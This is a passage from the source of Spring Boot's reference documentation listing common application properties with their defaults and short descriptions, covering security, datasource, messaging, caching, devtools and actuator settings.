to the user\n\tsecurity.require-ssl=false # advanced settings ...\n\tsecurity.enable-csrf=false\n\tsecurity.basic.enabled=true\n\tsecurity.basic.realm=Spring\n\tsecurity.basic.path= # \/**\n\tsecurity.basic.authorize-mode= # ROLE, AUTHENTICATED, NONE\n\tsecurity.filter-order=0\n\tsecurity.headers.xss=false\n\tsecurity.headers.cache=false\n\tsecurity.headers.frame=false\n\tsecurity.headers.content-type=false\n\tsecurity.headers.hsts=all # none \/ domain \/ all\n\tsecurity.sessions=stateless # always \/ never \/ if_required \/ stateless\n\tsecurity.ignored= # Comma-separated list of paths to exclude from the default secured paths\n\n\t# SECURITY OAUTH2 CLIENT ({sc-spring-boot-autoconfigure}\/security\/oauth2\/OAuth2ClientProperties.{sc-ext}[OAuth2ClientProperties]\n\tsecurity.oauth2.client.client-id= # OAuth2 client id\n security.oauth2.client.client-secret= # OAuth2 client secret. A random secret is generated by default\n\n # SECURITY OAUTH2 SSO ({sc-spring-boot-autoconfigure}\/security\/oauth2\/client\/OAuth2SsoProperties.{sc-ext}[OAuth2SsoProperties]\n security.oauth2.sso.filter-order= # Filter order to apply if not providing an explicit WebSecurityConfigurerAdapter\n security.oauth2.sso.login-path= # Path to the login page, i.e. the one that triggers the redirect to the OAuth2 Authorization Server\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.name= # name of the data source\n\tspring.datasource.initialize=true # populate using data.sql\n\tspring.datasource.schema= # a schema (DDL) script resource reference\n\tspring.datasource.data= # a data (DML) script resource reference\n\tspring.datasource.sql-script-encoding= # a charset for reading SQL scripts\n\tspring.datasource.platform= # the platform to use in the schema resource (schema-${platform}.sql)\n\tspring.datasource.continue-on-error=false # continue even if can't be initialized\n\tspring.datasource.separator=; # statement separator in SQL initialization scripts\n\tspring.datasource.driver-class-name= # JDBC Settings...\n\tspring.datasource.url=\n\tspring.datasource.username=\n\tspring.datasource.password=\n\tspring.datasource.jndi-name= # For JNDI lookup (class, url, username & password are ignored when set)\n\tspring.datasource.max-active=100 # Advanced configuration...\n\tspring.datasource.max-idle=8\n\tspring.datasource.min-idle=8\n\tspring.datasource.initial-size=10\n\tspring.datasource.validation-query=\n\tspring.datasource.test-on-borrow=false\n\tspring.datasource.test-on-return=false\n\tspring.datasource.test-while-idle=\n\tspring.datasource.time-between-eviction-runs-millis=\n\tspring.datasource.min-evictable-idle-time-millis=\n\tspring.datasource.max-wait=\n\tspring.datasource.jmx-enabled=false # Export JMX MBeans (if supported)\n\n\t# DAO ({sc-spring-boot-autoconfigure}\/dao\/PersistenceExceptionTranslationAutoConfiguration.{sc-ext}[PersistenceExceptionTranslationAutoConfiguration])\n\tspring.dao.exceptiontranslation.enabled=true\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.host= # the db host\n\tspring.data.mongodb.port=27017 # the connection port (defaults to 27107)\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # connection URL\n\tspring.data.mongodb.database=\n\tspring.data.mongodb.authentication-database=\n\tspring.data.mongodb.grid-fs-database=\n\tspring.data.mongodb.username=\n\tspring.data.mongodb.password=\n\tspring.data.mongodb.repositories.enabled=true # if spring data repository support is enabled\n\tspring.data.mongodb.field-naming-strategy= # fully qualified name of the FieldNamingStrategy to use\n\n\t# EMBEDDED MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/embedded\/EmbeddedMongoProerties.{sc-ext}[EmbeddedMongoProperties])\n\tspring.mongodb.embedded.version=2.6.10 # version of Mongo to use\n\tspring.mongodb.embedded.features=SYNC_DELAY # comma-separated list of features to enable\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.jpa.properties.*= # properties to set on the JPA connection\n\tspring.jpa.open-in-view=true\n\tspring.jpa.show-sql=true\n\tspring.jpa.database-platform=\n\tspring.jpa.database=\n\tspring.jpa.generate-ddl=false # ignored by Hibernate, might be useful for other vendors\n\tspring.jpa.hibernate.naming-strategy= # naming classname\n\tspring.jpa.hibernate.ddl-auto= # defaults to create-drop for embedded dbs\n\tspring.data.jpa.repositories.enabled=true # if spring data repository support is enabled\n\n\t# JTA ({sc-spring-boot-autoconfigure}\/transaction\/jta\/JtaAutoConfiguration.{sc-ext}[JtaAutoConfiguration])\n\tspring.jta.log-dir= # transaction log dir\n\tspring.jta.*= # technology specific configuration\n\n\t# JOOQ ({sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration])\n\tspring.jooq.sql-dialect=\n\n\t# ATOMIKOS\n\tspring.jta.atomikos.connectionfactory.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.connectionfactory.ignore-session-transacted-flag=true # Whether or not to ignore the transacted flag when creating session\n\tspring.jta.atomikos.connectionfactory.local-transaction-mode=false # Whether or not local transactions are desired\n\tspring.jta.atomikos.connectionfactory.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.connectionfactory.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.connectionfactory.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.connectionfactory.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.unique-resource-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.atomikos.datasource.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool\n\tspring.jta.atomikos.datasource.default-isolation-level= # Default isolation level of connections provided by the pool\n\tspring.jta.atomikos.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.atomikos.datasource.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread\n\tspring.jta.atomikos.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.atomikos.datasource.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.max-pool-size=1 # The maximum size of the pool\n\tspring.jta.atomikos.datasource.min-pool-size=1 # The minimum size of the pool\n\tspring.jta.atomikos.datasource.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.atomikos.datasource.unique-resource-name=dataSource # The unique name used to identify the resource during recovery\n\n\t# BITRONIX\n\tspring.jta.bitronix.connectionfactory.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.connectionfactory.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.connectionfactory.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.connectionfactory.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.connectionfactory.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.connectionfactory.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.connectionfactory.cache-producers-consumers=true # Whether or not produces and consumers should be cached\n\tspring.jta.bitronix.connectionfactory.defer-connection-release=true # Whether or not the provider can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.connectionfactory.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.connectionfactory.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit\n\tspring.jta.bitronix.connectionfactory.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.connectionfactory.password= # The password to use to connect to the JMS provider\n\tspring.jta.bitronix.connectionfactory.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.connectionfactory.test-connections=true # Whether or not connections should be tested when acquired from the pool\n\tspring.jta.bitronix.connectionfactory.two-pc-ordering-position=1 # The postion that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.connectionfactory.unique-name=jmsConnectionFactory # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.connectionfactory.use-tm-join=true Whether or not TMJOIN should be used when starting XAResources\n\tspring.jta.bitronix.connectionfactory.user= # The user to use to connect to the JMS provider\n\tspring.jta.bitronix.datasource.acquire-increment=1 # Number of connections to create when growing the pool\n\tspring.jta.bitronix.datasource.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired\n\tspring.jta.bitronix.datasource.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool\n\tspring.jta.bitronix.datasource.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions\n\tspring.jta.bitronix.datasource.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted\n\tspring.jta.bitronix.datasource.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically\n\tspring.jta.bitronix.datasource.cursor-holdability= # The default cursor holdability for connections\n\tspring.jta.bitronix.datasource.defer-connection-release=true # Whether or not the database can run many transactions on the same connection and supports transaction interleaving\n\tspring.jta.bitronix.datasource.enable-jdbc4-connection-test= # Whether or not Connection.isValid() is called when acquiring a connection from the pool\n\tspring.jta.bitronix.datasource.ignore-recovery-failures=false # Whether or not recovery failures should be ignored\n\tspring.jta.bitronix.datasource.isolation-level= # The default isolation level for connections\n\tspring.jta.bitronix.datasource.local-auto-commit= # The default auto-commit mode for local transactions\n\tspring.jta.bitronix.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection\n\tspring.jta.bitronix.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool\n\tspring.jta.bitronix.datasource.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit\n\tspring.jta.bitronix.datasource.min-pool-size=0 # The minimum size of the pool\n\tspring.jta.bitronix.datasource.prepared-statement-cache-size=0 # The target size of the prepared statement cache. 0 disables the cache\n\tspring.jta.bitronix.datasource.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction\n\tspring.jta.bitronix.datasource.test-query= # SQL query or statement used to validate a connection before returning it\n\tspring.jta.bitronix.datasource.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE)\n\tspring.jta.bitronix.datasource.unique-name=dataSource # The unique name used to identify the resource during recovery\n\tspring.jta.bitronix.datasource.use-tm-join=true Whether or not TMJOIN should be used when starting XAResources\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr\n\tspring.data.solr.zk-host=\n\tspring.data.solr.repositories.enabled=true # if spring data repository support is enabled\n\n\t# ELASTICSEARCH ({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties])\n\tspring.data.elasticsearch.cluster-name= # The cluster name (defaults to elasticsearch)\n\tspring.data.elasticsearch.cluster-nodes= # The address(es) of the server node (comma-separated; if not specified starts a client node)\n\tspring.data.elasticsearch.properties.*= # Additional properties used to configure the client\n\tspring.data.elasticsearch.repositories.enabled=true # if spring data repository support is enabled\n\n\t# DATA REST ({spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[RepositoryRestConfiguration])\n\tspring.data.rest.base-path= # base path against which the exporter should calculate its links\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.*= # Any public property available on the auto-configured `Flyway` object\n\tflyway.check-location=false # check that migration scripts location exists\n\tflyway.locations=classpath:db\/migration # locations of migrations scripts\n\tflyway.schemas= # schemas to update\n\tflyway.init-version= 1 # version to start migration\n\tflyway.init-sqls= # SQL statements to execute to initialize a connection immediately after obtaining it\n\tflyway.sql-migration-prefix=V\n\tflyway.sql-migration-suffix=.sql\n\tflyway.enabled=true\n\tflyway.url= # JDBC url if you want Flyway to create its own DataSource\n\tflyway.user= # JDBC username if you want Flyway to create its own DataSource\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource\n\n\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml\n\tliquibase.check-change-log-location=true # check the change log location exists\n\tliquibase.contexts= # runtime contexts to use\n\tliquibase.default-schema= # default database schema to use\n\tliquibase.drop-first=false\n\tliquibase.enabled=true\n\tliquibase.url= # specific JDBC url (if not set the default datasource is used)\n\tliquibase.user= # user name for liquibase.url\n\tliquibase.password= # password for liquibase.url\n\n\t# JMX\n\tspring.jmx.default-domain= # JMX domain name\n\tspring.jmx.enabled=true # Expose MBeans from Spring\n\tspring.jmx.server=mbeanServer # MBeanServer bean name\n\n\t# RABBIT ({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.addresses= # connection addresses (e.g. myhost:9999,otherhost:1111)\n\tspring.rabbitmq.dynamic=true # create an AmqpAdmin bean\n\tspring.rabbitmq.host= # connection host\n\tspring.rabbitmq.port= # connection port\n\tspring.rabbitmq.password= # login password\n\tspring.rabbitmq.requested-heartbeat= # requested heartbeat timeout, in seconds; zero for none\n\tspring.rabbitmq.listener.acknowledge-mode= # acknowledge mode of container\n\tspring.rabbitmq.listener.auto-startup=true # start the container automatically on startup\n\tspring.rabbitmq.listener.concurrency= # minimum number of consumers\n\tspring.rabbitmq.listener.max-concurrency= # maximum number of consumers\n\tspring.rabbitmq.listener.prefetch= # number of messages to be handled in a single request\n\tspring.rabbitmq.listener.transaction-size= # number of messages to be processed in a transaction\n\tspring.rabbitmq.ssl.enabled=false # enable SSL support\n\tspring.rabbitmq.ssl.key-store= # path to the key store that holds the SSL certificate\n\tspring.rabbitmq.ssl.key-store-password= # password used to access the key store\n\tspring.rabbitmq.ssl.trust-store= # trust store that holds SSL certificates\n\tspring.rabbitmq.ssl.trust-store-password= # password used to access the trust store\n\tspring.rabbitmq.username= # login user\n\tspring.rabbitmq.virtual-host= # virtual host to use when connecting to the broker\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.database= # database name\n\tspring.redis.host=localhost # server host\n\tspring.redis.password= # server password\n\tspring.redis.port=6379 # connection port\n\tspring.redis.pool.max-idle=8 # pool settings ...\n\tspring.redis.pool.min-idle=0\n\tspring.redis.pool.max-active=8\n\tspring.redis.pool.max-wait=-1\n\tspring.redis.sentinel.master= # name of Redis server\n\tspring.redis.sentinel.nodes= # comma-separated list of host:port pairs\n\tspring.redis.timeout= # connection timeout in milliseconds\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url=tcp:\/\/localhost:61616 # connection URL\n\tspring.activemq.user=\n\tspring.activemq.password=\n\tspring.activemq.in-memory=true # broker kind to create if no broker-url is specified\n\tspring.activemq.pooled=false\n\n\t# ARTEMIS ({sc-spring-boot-autoconfigure}\/jms\/artemis\/ArtemisProperties.{sc-ext}[ArtemisProperties])\n\tspring.artemis.mode= # connection mode (native, embedded)\n\tspring.artemis.host=localhost # hornetQ host (native mode)\n\tspring.artemis.port=5445 # hornetQ port (native mode)\n\tspring.artemis.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.artemis.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.artemis.embedded.persistent=false # message persistence\n\tspring.artemis.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.artemis.embedded.queues= # comma-separated queues to create on startup\n\tspring.artemis.embedded.topics= # comma-separated topics to create on startup\n\tspring.artemis.embedded.cluster-password= # customer password (randomly generated by default)\n\n\t# HORNETQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.mode= # connection mode (native, embedded)\n\tspring.hornetq.host=localhost # hornetQ host (native mode)\n\tspring.hornetq.port=5445 # hornetQ port (native mode)\n\tspring.hornetq.embedded.enabled=true # if the embedded server is enabled (needs hornetq-jms-server.jar)\n\tspring.hornetq.embedded.server-id= # auto-generated id of the embedded server (integer)\n\tspring.hornetq.embedded.persistent=false # message persistence\n\tspring.hornetq.embedded.data-directory= # location of data content (when persistence is enabled)\n\tspring.hornetq.embedded.queues= # comma-separated queues to create on startup\n\tspring.hornetq.embedded.topics= # comma-separated topics to create on startup\n\tspring.hornetq.embedded.cluster-password= # customer password (randomly generated by default)\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.jndi-name= # JNDI location of a JMS ConnectionFactory\n\tspring.jms.listener.acknowledge-mode= # session acknowledgment mode\n\tspring.jms.listener.auto-startup=true # start the container automatically on startup\n\tspring.jms.listener.concurrency= # minimum number of concurrent consumers\n\tspring.jms.listener.max-concurrency= # maximum number of concurrent consumers\n\tspring.jms.pub-sub-domain= # false for queue (default), true for topic\n\n\t# Email ({sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[MailProperties])\n\tspring.mail.host=smtp.acme.org # mail server host\n\tspring.mail.port= # mail server port\n\tspring.mail.username=\n\tspring.mail.password=\n\tspring.mail.default-encoding=UTF-8 # encoding to use for MimeMessages\n\tspring.mail.properties.*= # properties to set on the JavaMail session\n\tspring.mail.jndi-name= # JNDI location of a Mail Session\n\tspring.mail.test-connection=false # Test that the mail server is available on startup\n\n\t# SPRING BATCH ({sc-spring-boot-autoconfigure}\/batch\/BatchProperties.{sc-ext}[BatchProperties])\n\tspring.batch.job.names=job1,job2\n\tspring.batch.job.enabled=true\n\tspring.batch.initializer.enabled=true\n\tspring.batch.schema= # batch schema to load\n\tspring.batch.table-prefix= # table prefix for all the batch meta-data tables\n\n\t# SPRING CACHE ({sc-spring-boot-autoconfigure}\/cache\/CacheProperties.{sc-ext}[CacheProperties])\n\tspring.cache.type= # generic, ehcache, hazelcast, infinispan, jcache, redis, guava, simple, none\n\tspring.cache.cache-names= # cache names to create on startup\n\tspring.cache.ehcache.config= # location of the ehcache configuration\n\tspring.cache.hazelcast.config= # location of the hazelcast configuration\n\tspring.cache.infinispan.config= # location of the infinispan configuration\n\tspring.cache.jcache.config= # location of jcache configuration\n\tspring.cache.jcache.provider= # fully qualified name of the CachingProvider implementation to use\n\tspring.cache.guava.spec= # link:http:\/\/docs.guava-libraries.googlecode.com\/git\/javadoc\/com\/google\/common\/cache\/CacheBuilderSpec.html[guava specs]\n\n\t# AOP\n\tspring.aop.auto=\n\tspring.aop.proxy-target-class=\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding= # Expected character encoding the application must use\n\n\t# SPRING SOCIAL ({sc-spring-boot-autoconfigure}\/social\/SocialWebAutoConfiguration.{sc-ext}[SocialWebAutoConfiguration])\n\tspring.social.auto-connection-views=true # Set to true for default connection views or false if you provide your own\n\n\t# SPRING SOCIAL FACEBOOK ({sc-spring-boot-autoconfigure}\/social\/FacebookAutoConfiguration.{sc-ext}[FacebookAutoConfiguration])\n\tspring.social.facebook.app-id= # your application's Facebook App ID\n\tspring.social.facebook.app-secret= # your application's Facebook App Secret\n\n\t# SPRING SOCIAL LINKEDIN ({sc-spring-boot-autoconfigure}\/social\/LinkedInAutoConfiguration.{sc-ext}[LinkedInAutoConfiguration])\n\tspring.social.linkedin.app-id= # your application's LinkedIn App ID\n\tspring.social.linkedin.app-secret= # your application's LinkedIn App Secret\n\n\t# SPRING SOCIAL TWITTER ({sc-spring-boot-autoconfigure}\/social\/TwitterAutoConfiguration.{sc-ext}[TwitterAutoConfiguration])\n\tspring.social.twitter.app-id= # your application's Twitter App ID\n\tspring.social.twitter.app-secret= # your application's Twitter App Secret\n\n\t# SPRING MOBILE SITE PREFERENCE ({sc-spring-boot-autoconfigure}\/mobile\/SitePreferenceAutoConfiguration.{sc-ext}[SitePreferenceAutoConfiguration])\n\tspring.mobile.sitepreference.enabled=true # enabled by default\n\n\t# SPRING MOBILE DEVICE VIEWS ({sc-spring-boot-autoconfigure}\/mobile\/DeviceDelegatingViewResolverAutoConfiguration.{sc-ext}[DeviceDelegatingViewResolverAutoConfiguration])\n\tspring.mobile.devicedelegatingviewresolver.enabled=true # disabled by default\n\tspring.mobile.devicedelegatingviewresolver.enable-fallback= # enable support for fallback resolution, default to false.\n\tspring.mobile.devicedelegatingviewresolver.normal-prefix=\n\tspring.mobile.devicedelegatingviewresolver.normal-suffix=\n\tspring.mobile.devicedelegatingviewresolver.mobile-prefix=mobile\/\n\tspring.mobile.devicedelegatingviewresolver.mobile-suffix=\n\tspring.mobile.devicedelegatingviewresolver.tablet-prefix=tablet\/\n\tspring.mobile.devicedelegatingviewresolver.tablet-suffix=\n\n\t# ----------------------------------------\n\t# DEVTOOLS PROPERTIES\n\t# ----------------------------------------\n\n # DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/DevToolsProperties.{sc-ext}[DevToolsProperties])\n spring.devtools.restart.enabled=true # enable automatic restart\n spring.devtools.restart.exclude= # patterns that should be excluding for triggering a full restart\n spring.devtools.restart.poll-interval= # amount of time (in milliseconds) to wait between polling for classpath changes\n spring.devtools.restart.quiet-period= # amount of quiet time (in milliseconds) required without any classpath changes before a restart is triggered\n spring.devtools.restart.trigger-file= # name of a specific file that when changed will trigger the restart\n\tspring.devtools.livereload.enabled=true # enable a livereload.com compatible server\n spring.devtools.livereload.port=35729 # server port.\n\n # REMOTE DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/RemoteDevToolsProperties.{sc-ext}[RemoteDevToolsProperties])\n spring.devtools.remote.context-path=\/.~~spring-boot!~ # context path used to handle the remote connection\n spring.devtools.remote.debug.enabled=true # enable remote debug support\n spring.devtools.remote.debug.local-port=8000 # local remote debug server port\n spring.devtools.remote.restart.enabled=true # enable remote restart\n spring.devtools.remote.secret= # a shared secret required to establish a connection\n spring.devtools.remote.secret-header-name=X-AUTH-TOKEN # HTTP header used to transfer the shared secret\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# MANAGEMENT HTTP SERVER ({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.port= # defaults to 'server.port'\n\tmanagement.address= # bind to a specific NIC\n\tmanagement.context-path= # default to '\/'\n\tmanagement.add-application-context-header= # default to true\n\tmanagement.security.enabled=true # enable security\n\tmanagement.security.role=ADMIN # role required to access the management endpoint\n\tmanagement.security.sessions=stateless # session creating policy to use (always, never, if_required, stateless)\n\n\t# PID FILE ({sc-spring-boot-actuator}\/system\/ApplicationPidFileWriter.{sc-ext}[ApplicationPidFileWriter])\n\tspring.pid.file= # Location of the PID file to write\n\tspring.pid.fail-on-write-error= # Fail if the PID file cannot be written\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] subclasses)\n\tendpoints.autoconfig.id=autoconfig\n\tendpoints.autoconfig.sensitive=true\n\tendpoints.autoconfig.enabled=true\n\tendpoints.beans.id=beans\n\tendpoints.beans.sensitive=true\n\tendpoints.beans.enabled=true\n\tendpoints.configprops.id=configprops\n\tendpoints.configprops.sensitive=true\n\tendpoints.configprops.enabled=true\n\tendpoints.configprops.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.dump.id=dump\n\tendpoints.dump.sensitive=true\n\tendpoints.dump.enabled=true\n\tendpoints.enabled=true # enable all endpoints\n\tendpoints.env.id=env\n\tendpoints.env.sensitive=true\n\tendpoints.env.enabled=true\n\tendpoints.env.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # suffix or regex\n\tendpoints.health.id=health\n\tendpoints.health.sensitive=true\n\tendpoints.health.enabled=true\n\tendpoints.health.mapping.*= # mapping of health statuses to HttpStatus codes\n\tendpoints.health.time-to-live=1000\n\tendpoints.info.id=info\n\tendpoints.info.sensitive=false\n\tendpoints.info.enabled=true\n\tendpoints.logfile.path=\/logfile\n\tendpoints.logfile.sensitive=true\n\tendpoints.logfile.enabled=true\n\tendpoints.mappings.enabled=true\n\tendpoints.mappings.id=mappings\n\tendpoints.mappings.sensitive=true\n\tendpoints.metrics.id=metrics\n\tendpoints.metrics.sensitive=true\n\tendpoints.metrics.enabled=true\n\tendpoints.shutdown.id=shutdown\n\tendpoints.shutdown.sensitive=true\n\tendpoints.shutdown.enabled=false\n\tendpoints.trace.id=trace\n\tendpoints.trace.sensitive=true\n\tendpoints.trace.enabled=true\n\n\t# HYPERMEDIA ENDPOINTS\n\tendpoints.docs.enabled=true\n\tendpoints.docs.curies.enabled=false\n\tendpoints.hal.enabled=true\n\tendpoints.links.enable=true\n\n\t# ENDPOINTS CORS CONFIGURATION ({sc-spring-boot-actuator}\/autoconfigure\/MvcEndpointCorsProperties.{sc-ext}[MvcEndpointCorsProperties])\n\tendpoints.cors.allow-credentials= # set whether user credentials are support. When not set, credentials are not supported.\n\tendpoints.cors.allowed-origins= # comma-separated list of origins to allow. * allows all origins. When not set, CORS support is disabled.\n\tendpoints.cors.allowed-methods= # comma-separated list of methods to allow. * allows all methods. When not set, defaults to GET.\n\tendpoints.cors.allowed-headers= # comma-separated list of headers to allow in a request. * allows all headers.\n\tendpoints.cors.exposed-headers= # comma-separated list of headers to include in a response.\n\tendpoints.cors.max-age=1800 # how long, in seconds, the response from a pre-flight request can be cached by clients.\n\n\t# HEALTH INDICATORS (previously health.*)\n\tmanagement.health.db.enabled=true\n\tmanagement.health.elasticsearch.enabled=true\n\tmanagement.health.elasticsearch.indices= # comma-separated index names\n\tmanagement.health.elasticsearch.response-timeout=100 # the time, in milliseconds, to wait for a response from the cluster\n\tmanagement.health.diskspace.enabled=true\n\tmanagement.health.diskspace.path=.\n\tmanagement.health.diskspace.threshold=10485760\n\tmanagement.health.jms.enabled=true\n\tmanagement.health.mail.enabled=true\n\tmanagement.health.mongo.enabled=true\n\tmanagement.health.rabbit.enabled=true\n\tmanagement.health.redis.enabled=true\n\tmanagement.health.solr.enabled=true\n\tmanagement.health.status.order=DOWN, OUT_OF_SERVICE, UNKNOWN, UP\n\n\t# MVC ONLY ENDPOINTS\n\tendpoints.jolokia.path=\/jolokia\n\tendpoints.jolokia.sensitive=true\n\tendpoints.jolokia.enabled=true # when using Jolokia\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.enabled=true # enable JMX export of all endpoints\n\tendpoints.jmx.domain= # the JMX domain, defaults to 'org.springboot'\n\tendpoints.jmx.unique-names=false\n\tendpoints.jmx.static-names=\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# REMOTE SHELL\n\tshell.auth=simple # jaas, key, simple, spring\n\tshell.command-refresh-interval=-1\n\tshell.command-path-patterns= # classpath*:\/commands\/**, classpath*:\/crash\/commands\/**\n\tshell.config-path-patterns= # classpath*:\/crash\/*\n\tshell.disabled-commands=jpa*,jdbc*,jndi* # comma-separated list of commands to disable\n\tshell.disabled-plugins=false # don't expose plugins\n\tshell.ssh.enabled= # ssh settings ...\n\tshell.ssh.key-path=\n\tshell.ssh.port=\n\tshell.telnet.enabled= # telnet settings ...\n\tshell.telnet.port=\n\tshell.auth.jaas.domain= # authentication settings ...\n\tshell.auth.key.path=\n\tshell.auth.simple.user.name=\n\tshell.auth.simple.user.password=\n\tshell.auth.spring.roles=\n\n\t# METRICS EXPORT ({sc-spring-boot-actuator}\/metrics\/export\/MetricExportProperties.{sc-ext}[MetricExportProperties])\n\tspring.metrics.export.enabled=true # flag to disable all metric exports (assuming any MetricWriters are available)\n\tspring.metrics.export.delay-millis=5000 # delay in milliseconds between export ticks\n\tspring.metrics.export.send-latest=true # flag to switch off any available optimizations based on not exporting unchanged metric values\n\tspring.metrics.export.includes= # list of patterns for metric names to include\n\tspring.metrics.export.excludes= # list of patterns for metric names to exclude. Applied after the includes\n\tspring.metrics.export.redis.prefix=spring.metrics # prefix for redis repository if active\n\tspring.metrics.export.redis.key=keys.spring.metrics # key for redis repository export (if active)\n\tspring.metrics.export.triggers.*= # specific trigger properties per MetricWriter bean name\n\n\t# SENDGRID 